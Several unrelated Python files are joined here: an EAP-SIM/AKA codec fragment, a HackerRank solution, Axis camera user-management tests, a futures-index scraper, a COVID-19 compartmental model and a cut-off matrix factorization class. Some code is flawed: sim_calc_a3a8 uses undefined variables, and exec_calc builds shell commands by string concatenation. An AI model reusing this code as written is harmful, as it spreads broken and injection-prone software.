self.id=0
self.len=0
self.type=0
self.stype=0
self.msg=""
self.avps=[]
#----------------------------------------------------------------------
# Quit program with error
def e_bailOut(msg):
logging.error(msg)
sys.exit(1)
#Split message into parts (remove field from remaining body)
def e_chop_msg(msg,size):
return (msg[0:size],msg[size:])
def decodeU32(data):
ret=struct.unpack("!I",data.decode("hex"))[0]
return int(ret)
#----------------------------------------------------------------------
# Load diameter dictionary
def LoadEAPDictionary(file):
global dict_eaps
global dict_eapsubs
doc = minidom.parse(file)
node = doc.documentElement
dict_eaps=doc.getElementsByTagName("eap")
dict_eapsubs=doc.getElementsByTagName("eapsub")
def dictEAPname2code(name):
dbg="Searching EAP dictionary for N",name
logging.debug(dbg)
for eap in dict_eaps:
Name=eap.getAttribute("name")
Code=eap.getAttribute("code")
Reserved=eap.getAttribute("reserved")
if name==Name:
return (int(Code),Reserved)
dbg="Searching EAP dictionary failed for N",name
e_bailOut(dbg)
def dictEAPcode2name(code):
dbg="Searching EAP dictionary for C",code
logging.debug(dbg)
for eap in dict_eaps:
Name=eap.getAttribute("name")
Code=eap.getAttribute("code")
Reserved=eap.getAttribute("reserved")
if code==int(Code):
return (Name,Reserved)
dbg="Searching EAP dictionary failed for C",code
e_bailOut(dbg)
#Not used here, but in tool_Payload_decode.py
def dictEAPSUBtype2name(stype):
dbg="Searching EAP dictionary for S",stype
logging.debug(dbg)
for eap in dict_eapsubs:
Name=eap.getAttribute("name")
Stype=eap.getAttribute("subtype")
if Stype=="":
Stype=str(ERROR)
if stype==int(Stype):
return Name
dbg="Searching EAP dictionary failed for S",stype
e_bailOut(dbg)
#Not used here, but in client/example
def dictEAPSUBname2type(name):
dbg="Searching EAP dictionary for N",name
logging.debug(dbg)
for eap in dict_eapsubs:
Name=eap.getAttribute("name")
Stype=eap.getAttribute("subtype")
if name==Name:
return int(Stype)
dbg="Searching EAP dictionary failed for N",name
e_bailOut(dbg)
# EAP Packet format
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Code | Identifier | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Data ...
# +-+-+-+-+
# AT_SELECTED_VERSION - decode as value (Reserved field is value)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_SELECTED...| Length = 1 | Selected Version |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_NONCE_MT - decode as reserved (reserved field is not used)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |AT_NONCE_MT | Length = 5 | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# . NONCE_MT .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_IDENTITY - decode as bytelen (Reserved field is len in bytes).
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_IDENTITY | Length | Actual Identity Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# . Identity (optional) .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_PADDING - decode as include (Include reserved field)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_PADDING | Length | Padding... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |
# . .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# AT_RES - decode as bitlen (RES Length is in bit length)
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AT_RES | Length | RES Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-|
# . RES .
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
def getEAPTypeName(type):
if type==EAP_TYPE_IDENTITY:
return ("Identity",0)
if type==EAP_TYPE_SIM:
return ("EAP-SIM",0)
if type==EAP_TYPE_AKA:
return ("EAP-AKA",0)
if type==EAP_TYPE_AKAPRIME:
return ("EAP-AKA'",0)
return ("ERROR",ERROR)
def getEAPCodeName(code):
if code==EAP_CODE_REQUEST:
return "EAP-Request"
if code==EAP_CODE_RESPONSE:
return "EAP-Response"
if code==EAP_CODE_SUCCESS:
return "EAP-Success"
if code==EAP_CODE_FAILURE:
return "EAP-Failure"
return "ERROR"
# EAP-AKA(SIM) Header
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Code | Identifier | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type | Subtype | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# EAP AVPs can't be left as raw due to different packing methods
# So they MUST be packed as AVP tuples
def decode_EAP(msg):
EAP=EAPItem()
(scode,msg)=e_chop_msg(msg,2)
EAP.code=ord(scode.decode("hex"))
(sid,msg)=e_chop_msg(msg,2)
EAP.id=ord(sid.decode("hex"))
(slen,msg)=e_chop_msg(msg,4)
EAP.len=decodeU32("0000"+slen)
dbg="Decoding EAP-Payload","C",EAP.code,"I",EAP.id,"L",EAP.len
logging.debug(dbg)
#Failure does not have type, so stop here
if EAP.code==EAP_CODE_FAILURE:
return EAP
if EAP.code==EAP_CODE_SUCCESS:
return EAP
(stype,msg)=e_chop_msg(msg,2)
EAP.type=ord(stype.decode("hex"))
(et,er)=getEAPTypeName(EAP.type)
dbg="Debugging EAP-Payload","T",EAP.type,et,er
logging.debug(dbg)
#Identity has no other AVPs inside
if EAP.type==EAP_TYPE_IDENTITY:
EAP.avps.append(("Identity",msg.decode("hex")))
return EAP
if er!=ERROR:
(ssub,msg)=e_chop_msg(msg,2)
(sres,msg)=e_chop_msg(msg,4)
EAP.stype=decodeU32("000000"+ssub)
EAP.msg=msg
EAP.avps=splitEAPAVPs(msg)
return EAP
def encode_EAP(E):
# since all data is hex ecoded, divide by 2 and add header length
if int(E.cmd)==EAP_CODE_FAILURE:
E.len=4
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
if int(E.cmd)==EAP_CODE_SUCCESS:
E.len=4
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
if E.type==EAP_TYPE_IDENTITY:
E.len=4+len(E.msg)/2
ret="%02X" % E.cmd+"%02X"%E.id+"%04X"%E.len
ret=ret+E.msg
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
E.msg=joinEAPAVP(E.avps)
# Update len to new value
E.len=len(E.msg)/2+8
ret1="%02X" % E.cmd +"%02X"%E.id +"%04X"%E.len
ret2="%02X" % E.type+"%02X"%E.stype+"0000"
ret=ret1+ret2+E.msg
dbg="EAP-Payload",ret
logging.debug(dbg)
return ret
def splitEAPAVPs(msg):
avps=[]
while len(msg)>0:
(stype,msg)=e_chop_msg(msg,2) # Type
(slen,msg)=e_chop_msg(msg,2) # Len
(mtype,resdef)=dictEAPcode2name(decodeU32("000000"+stype))
mlen=ord(slen.decode("hex"))
(reserved,msg)=e_chop_msg(msg,4) # Reserved
(dmsg,msg)=e_chop_msg(msg,2*4*(mlen-1)) # Data
check=0
if resdef=="value":
check+=1
data=reserved
if resdef=="reserved":
check+=1
data=dmsg
if resdef=="bitlen":
check+=1
reslen=decodeU32("0000"+reserved)/4
data=dmsg[:reslen]
if resdef=="bytelen":
check+=1
reslen=decodeU32("0000"+reserved)*2
data=dmsg[:reslen]
if resdef=="include":
check+=1
data=reserved+dmsg
if check==0:
# All undefined values are skipped
e_bailOut("Unsuccessful decoding EAP AVP")
dbg="EAP AVP",mtype,"=",data,"+",resdef,"(",slen,")",len(data)/2,len(msg)/2
logging.debug(dbg)
avps.append((mtype,data))
return avps
def addEAPIdentity(msg):
return "%02X"%EAP_TYPE_IDENTITY+msg.encode("hex")
def addEAPAVP(name,value):
(code,reserved)=dictEAPname2code(name)
ret="%02X"%int(code)
mlen=(len(value)+7)/8+1
# Special case for AT_SELECTED_VERSION
if int(code)==16:
ret=ret+"01"
else:
ret=ret+"%02X"%mlen
dbg="Adding EAP",code,reserved,name,value
logging.debug(dbg)
# FIXME - this part of code is not well tested.
check=0
if reserved=="bitlen":
ret=ret+"%04X"%(len(value)*4)
check+=1
if reserved=="bytelen":
ret=ret+"%04X"%(len(value)/2)
check+=1
if reserved=="include":
# This might be wrong, but I don"t have any to test
check+=1
if reserved=="value":
check+=1
if check==0:
# All default and undefined values are 0
ret=ret+"0000"
ret=ret+value
# Fix padding
while len(ret)/2<calc_padding(len(ret)/2):
ret=ret+"00"
dbg="EAP Encoded as",ret
logging.debug(dbg)
return ret
# Calculate message padding
def calc_padding(msg_len):
return (msg_len+3)&~3
def joinEAPAVP(avps):
ret=""
for a in avps:
(name,value)=a
ret=ret+addEAPAVP(name,value)
return ret
def exec_calc(cmd_type,params):
args=cmd_type+" "+params
#p=subprocess.Popen(["./eapcalc",args],stdout=subprocess.PIPE)
#ret,err=p.communicate()
dbg="Calc input",platform.system(),cmd_type,params
logging.debug(dbg)
if platform.system()=="Windows":
p=subprocess.Popen("eapcalc.exe"+" "+args,stdout=subprocess.PIPE)
ret,err=p.communicate()
if platform.system()=="SunOS":
ret=commands.getoutput("./eapcalc.solx86"+" "+args)
#>>> platform.linux_distribution()
#('Mandriva Linux', '2010.0', 'Official')
# FIXME: Learn to make distinction based on libc6 (e.g REHL/Ubuntu) to trigger proper aplication
if platform.system()=="Linux":
ret=commands.getoutput("./eapcalc.linux"+" "+args)
dbg="Calc output",ret
logging.debug(dbg)
if cmd_type=="milenage-f2345":
#XRES,CK,IK,AK,AKS
XRES=findValue(ret,"XRES=")
CK=findValue(ret,"CK=")
IK=findValue(ret,"IK=")
AK=findValue(ret,"AK=")
AKS=findValue(ret,"AKS=")
return XRES,CK,IK,AK,AKS
if cmd_type=="milenage-f1":
#XMAC,MACS
XMAC=findValue(ret,"XMAC=")
MACS=findValue(ret,"MACS=")
return XMAC,MACS
if cmd_type=="mac-sim":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="mac-aka":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="mac-akaprime":
#MAC
MAC=findValue(ret,"MAC=")
return MAC
if cmd_type=="sim":
#KENCR,KAUT,MSK,EMSK,MK
MK=findValue(ret,"MK=")
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,MK
if cmd_type=="aka":
#KENCR,KAUT,MSK,EMSK,MK
MK=findValue(ret,"MK=")
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,MK
if cmd_type=="akaprime":
#KENCR,KAUT,MSK,EMSK,KRE
KENCR=findValue(ret,"KENCR=")
KAUT=findValue(ret,"KAUT=")
KRE=findValue(ret,"KRE=")
MSK=findValue(ret,"MSK=")
EMSK=findValue(ret,"EMSK=")
return KENCR,KAUT,MSK,EMSK,KRE
if cmd_type=="encode":
#ENCR_DATA
DATA=findValue(ret,"ENCRYPTED=")
return DATA
if cmd_type=="decode":
#RAW_DATA
DATA=findValue(ret,"DECRYPTED=")
return DATA
def findValue(res,start):
for x in res.split("\n"):
if x.startswith(start):
dbg="Value",x,x[-1]
logging.debug(dbg)
# Fix for windows CR+LF instead of CR
if x[-1]=="\r":
x=x[:-1]
ll=x.split("=")
return ll[1]
return ERROR
def addMAC(E,K,D):
E.avps.append(("AT_MAC","00"*16))
tmp=encode_EAP(E)
#Clear it so we can do it again
E.msg=""
# Call hmac1 or hmac256 based on E.type
if E.type==EAP_TYPE_SIM:
hmac_type="mac-sim"
if E.type==EAP_TYPE_AKA:
hmac_type="mac-aka"
if E.type==EAP_TYPE_AKAPRIME:
hmac_type="mac-akaprime"
# Do the calc
dbg="Calculate ",hmac_type,K,tmp
logging.debug(dbg)
params="0x"+K
if E.type==EAP_TYPE_SIM:
params+=" 0x"+D
params+=" 0x"+tmp
MAC=exec_calc(hmac_type,params)
dbg="Output ",MAC
logging.debug(dbg)
# Replace empty with new MAC
E.avps.pop()
E.avps.append(("AT_MAC",MAC))
tmp1=encode_EAP(E)
return
def sim_calc_a3a8(RAND,K):
logging.debug(dbg)
SRES,KC=exec_calc("a3a8",params)
return SRES,KC
def sim_calc_keys(Identity,KC,NONCE_MT,VERSION_LIST,SELECTED_VER):
params=Identity+" 0x"+KC+" 0x"+NONCE_MT+" 0x"+VERSION_LIST+" "+SELECTED_VER
dbg="Calculating SIM keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,MK=exec_calc("sim",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,MK
def aka_calc_milenage(OP,K,RAND):
params="0x"+OP+" 0x"+K+" 0x"+RAND
XRES,CK,IK,AK,AKS=exec_calc("milenage-f2345",params)
return XRES,CK,IK,AK,AKS
def aka_calc_keys(Identity,Ck,Ik):
params=Identity+" 0x"+Ck+" 0x"+Ik
dbg="Calculating AKA keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,MK=exec_calc("aka",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,MK
def akap_calc_keys(Identity,Ck,Ik):
params=Identity+" 0x"+Ck+" 0x"+Ik
dbg="Calculating AKA' keys",params
logging.debug(dbg)
KENCR,KAUT,MSK,EMSK,KRE=exec_calc("akaprime",params)
dbg="Output KENCR",KENCR
logging.debug(dbg)
return KENCR,KAUT,MSK,EMSK,KRE
def decrypt_data(Iv,Kencr,encr_data):
params="0x"+Iv+" 0x"+Kencr+" 0x"+encr_data
DATA=exec_calc("decode",params)
return DATA
def xor_string(s1, s2):
# truncate the result to the minimum length
trunc = min( len(s1), len(s2) )
s1, s2 = s1[:trunc], s2[:trunc]
res = ""
# xor byte per byte
for i in range(trunc):
res += chr( ord(s1[i]) ^ ord(s2[i]) )
return res
######################################################
# History
# Ver 0.2.0 - Feb 17, 2012 - EAP-Payload decoder
# Ver 0.2.1 - Feb 19, 2012 - EAP-Payload+ AKA/AKA' C calculations
# Ver 0.2.8 - May 25, 2012 - EAP functions moved to separate source
# - bugfix: added padding on encoding, field size calculation checked
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
mx= max(fs)
mi= min(fs)
if (fs.count(mx) ==1 or fs.count(mi)==1) and (mx-mi == 1):
return 'YES'
elif fs.count(mi)==1 and mi==1:
return 'YES'
return 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
|
"""Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv"
digusers="root,operator,viewer"
"""
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/20 14:52
Desc: 南华期货-商品指数历史走势-价格指数-数值
http://www.nanhua.net/nhzc/varietytrend.html
1000 点开始, 用收益率累计
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
"""
import time
import requests
import pandas as pd
def futures_nh_index_symbol_table() -> pd.DataFrame:
"""
南华期货-南华指数所有品种一览表
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:return: 南华指数所有品种一览表
:rtype: pandas.DataFrame
"""
url = "http://www.nanhua.net/ianalysis/plate-variety.json"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df['firstday'] = pd.to_datetime(temp_df['firstday']).dt.date
return temp_df
def futures_nh_price_index(symbol: str = "A") -> pd.DataFrame:
"""
南华期货-南华指数单品种-价格-所有历史数据
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
:param symbol: 通过 ak.futures_nh_index_symbol_table() 获取
:type symbol: str
:return: 南华期货-南华指数单品种-价格-所有历史数据
:rtype: pandas.Series
"""
symbol_df = futures_nh_index_symbol_table()
if symbol in symbol_df["code"].tolist():
t = time.time()
url = f"http://www.nanhua.net/ianalysis/varietyindex/price/{symbol}.json?t={int(round(t * 1000))}"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.columns = ["date", "value"]
temp_df['date'] = pd.to_datetime(temp_df["date"], unit='ms').dt.date
return temp_df
if __name__ == "__main__":
futures_nh_index_symbol_table_df = futures_nh_index_symbol_table()
print(futures_nh_index_symbol_table_df)
futures_nh_price_index_df = futures_nh_price_index(symbol="NHAI")
print(futures_nh_price_index_df)
|
"""Custom COVID19 Compartmental model
"""
from ..model import CompartmentalModel
class COVID19(CompartmentalModel):
def __init__(self,
N,
beta,
incubation_rate = 1/3.7,
recovery_rate_asymptomatic = 1/4.7,
recovery_rate_mild = 1/4.7,
symptoms_to_hospital_rate = 1/5.5,
symptoms_to_icu_rate = 1/7,
proba_severe = 0.071,
proba_asymptomatic = 0.2,
proba_icu = 0.182,
recovery_rate_hospital = 0.046,
recovery_rate_icu = 0.035,
death_rate_hospital = 0.0046,
death_rate_icu = 0.0087,
isolation_ratio = 0.25,
offset = None,
):
"""COVID19 Compartmental Model
Parameters:
Default params are set according to INSERM research paper
"""
params = {
"N":N,
"beta":beta,
"incubation_rate":incubation_rate,
"recovery_rate_asymptomatic":recovery_rate_asymptomatic,
"recovery_rate_mild":recovery_rate_mild,
"recovery_rate_hospital":recovery_rate_hospital,
"recovery_rate_icu":recovery_rate_icu,
"symptoms_to_icu_rate":symptoms_to_icu_rate,
"symptoms_to_hospital_rate":symptoms_to_hospital_rate,
"death_rate_hospital":death_rate_hospital,
"death_rate_icu":death_rate_icu,
"proba_severe":proba_severe,
"proba_asymptomatic":proba_asymptomatic,
"proba_icu":proba_icu,
"isolation_ratio":isolation_ratio,
}
# Define compartments name and number
compartments = ["S","E","Ia","Im","Is","H","ICU","D","R"]
super().__init__(compartments,offset = offset,params = params)
# Parameters
self.N = N
self.beta = self._make_beta_parameter(beta)
# Prepare transitions
transitions = {
"S":{
"E":lambda y,t : y["S"] / N * self.beta(y,t) * (y["Ia"]+ isolation_ratio * (y["Im"] + y["Is"]))
},
"E":{
"Ia":lambda y,t : incubation_rate * (proba_asymptomatic) * y["E"],
"Im":lambda y,t : incubation_rate * (1 - proba_asymptomatic - proba_severe) * y["E"],
"Is":lambda y,t : incubation_rate * (proba_severe) * y["E"],
},
"Ia":{
"R":lambda y,t : recovery_rate_asymptomatic * y["Ia"],
},
"Im":{
"R":lambda y,t : recovery_rate_hospital* y["Im"],
},
"Is":{
"ICU":lambda y,t : symptoms_to_icu_rate * (proba_icu) * y["Is"],
"H":lambda y,t : symptoms_to_icu_rate * (1-proba_icu) * y["Is"],
},
"ICU":{
"R":lambda y,t : recovery_rate_icu * y["ICU"],
"D":lambda y,t : death_rate_icu * y["ICU"],
},
"H":{
"R":lambda y,t : recovery_rate_hospital * y["H"],
"D":lambda y,t : death_rate_hospital * y["H"],
},
}
# Add transition
self.add_transitions(transitions)
def R0(self, beta):
pa = self.params["proba_asymptomatic"]
ps = self.params["proba_severe"]
proba_icu = self.params["proba_icu"]
recovery_rate_asymptomatic = self.params["recovery_rate_asymptomatic"]
recovery_rate_mild = self.params["recovery_rate_mild"]
recovery_rate_severe = (1-proba_icu) * self.params["symptoms_to_hospital_rate"] + proba_icu * self.params["symptoms_to_icu_rate"]
isolation_ratio = self.params["isolation_ratio"]
return beta * (pa / recovery_rate_asymptomatic + (isolation_ratio * (1-pa-ps) / recovery_rate_mild) + (isolation_ratio * ps / recovery_rate_severe))
|
from lib.utils import top_k
from TraditionalRecommenderSystems.MatrixFactorization.Models import BaseMF
import numpy as np
import pandas as pd
import torch
from torch import nn
import torch.utils.data as data
from tqdm import tqdm
class MatrixFactorization(object):
def __init__(self, user_item_pairs, user_list, item_list, nb_factor=40, drop_rate=0.5, batch_size=32, lr=1e-1,
optimizer=torch.optim.Adam, loss_func=nn.MSELoss(reduction='mean'), sparse=False,
weight_decay=0., device='cuda', pro_process=None):
"""
Matrix Factorization based on Pytorch.
:param user_item_pairs: list. [(user, item, rating)].
:param user_list: list. The list of all the users (with no repeat).
:param item_list: list. The list of all the items (with no repeat).
:param nb_factor: int. The number of factors.
:param drop_rate: float 0~1. Drop rate of the dropout layer.
:param batch_size: int. Batch size of training
:param lr: float. Learning rate.
:param optimizer: torch.optim. Optimizer utilized to train the model.
:param loss_func: torch.nn.*Loss. Loss function of training.
:param sparse: boolean. The gradient requires to be sparse or not.
:param weight_decay: float. L2 regularization.
:param device: 'cpu' or 'cuda'.
:param pro_process: nn.Module.
"""
self.user_item_pairs = pd.DataFrame(user_item_pairs)
# build index-user, index-item
self.index_2_user = np.array(user_list)
self.index_2_item = np.array(item_list)
assert len(self.index_2_user) == len(set(self.index_2_user))
assert len(self.index_2_item) == len(set(self.index_2_item))
self.user_2_index = {self.index_2_user[i]: i for i in range(len(self.index_2_user))}
self.item_2_index = {self.index_2_item[i]: i for i in range(len(self.index_2_item))}
self.nb_user, self.nb_item = len(user_list), len(item_list)
# prepare training loader
train_user_indices = torch.from_numpy(self.users_to_indices(self.user_item_pairs[0].values)).long()
train_item_indices = torch.from_numpy(self.items_to_indices(self.user_item_pairs[1].values)).long()
train_ratings = torch.from_numpy(self.user_item_pairs[2].values.reshape(-1, 1)).float()
self.train_data_loader = data.DataLoader(data.TensorDataset(train_user_indices, train_item_indices,
train_ratings), batch_size=batch_size, shuffle=True)
# build model
self.nb_factor = nb_factor
self.lr = lr
self.batch_size = batch_size
self.loss_func = loss_func
self.weight_decay = weight_decay
self.device = device
self.sparse = sparse
self.process = pro_process
self.model = BaseMF(self.nb_user, self.nb_item, nb_factor, drop_rate, sparse, pro_process=self.process).to(device)
self.optimizer = optimizer(self.model.parameters(), lr=lr, weight_decay=weight_decay)
# build history rating matrix
self.pred_rating_matrix = None
self.history_rating_matrix = None
self.update_history_rating_matrix()
def train(self, epochs, test_data=None, test_epoch_step=1):
"""
Train the model.
:param epochs: int. The epochs of training.
:param test_data: [(user, item, rating)]. None if no validation is applied.
:param test_epoch_step: int. The step of validation.
:return: (list of training loss, list of test loss) if validation is applied, else only the list of training loss.
"""
hist_train_loss, hist_test_loss = [], []
if test_data is not None:
test_data = pd.DataFrame(test_data)
for epoch in range(epochs):
print('Epoch-{}/{}:'.format(epoch+1, epochs))
self.model.train()
train_loss = self.train_epoch()
hist_train_loss.append(train_loss)
if (test_data is not None) and (epoch % test_epoch_step == 0):
self.model.eval()
test_loss = self.eval(test_data.iloc[:, [0, 1]].values, ground_truth=test_data[2].values)
hist_test_loss.append(test_loss)
print('training loss = {}, test loss = {}'.format(train_loss, test_loss))
else:
print('training loss = {}'.format(train_loss))
self.update_pred_rating_matrix()
return hist_train_loss, hist_test_loss
def train_epoch(self):
"""
:return: training loss.
"""
self.model.train()
epoch_loss = 0.
for id_user, id_item, id_rating in tqdm(self.train_data_loader):
batch_loss = self.train_on_batch(id_user, id_item, id_rating)
epoch_loss += batch_loss
epoch_loss /= len(self.train_data_loader)
return epoch_loss
def train_on_batch(self, user_indices, item_indices, ratings):
users, items, ratings = user_indices.to(self.device), item_indices.to(self.device), ratings.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(users, items)
loss = self.loss_func(outputs, ratings)
loss.backward()
self.optimizer.step()
return loss.item()
def eval(self, user_item_pairs, ground_truth, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item).
:param ground_truth: the ground truth rating.
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
self.model.eval()
outputs = self.predict(user_item_pairs, batch_size=batch_size).ravel()
loss = np.mean((outputs-ground_truth.ravel())**2)
return loss
def predict(self, user_item_pairs, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
pairs = pd.DataFrame(user_item_pairs)
user_indices = self.users_to_indices(pairs[0].values)
item_indices = self.items_to_indices(pairs[1].values)
self.model.eval()
outputs = []
with torch.no_grad():
start_id = 0
end_id = min(batch_size, len(pairs))
while start_id < len(pairs):
outputs.append(self.predict_on_batch(user_indices[start_id:end_id], item_indices[start_id:end_id]))
start_id += batch_size
end_id = min(start_id+batch_size, len(pairs))
return np.concatenate(outputs, axis=0)
def predict_on_batch(self, user_indices, item_indices):
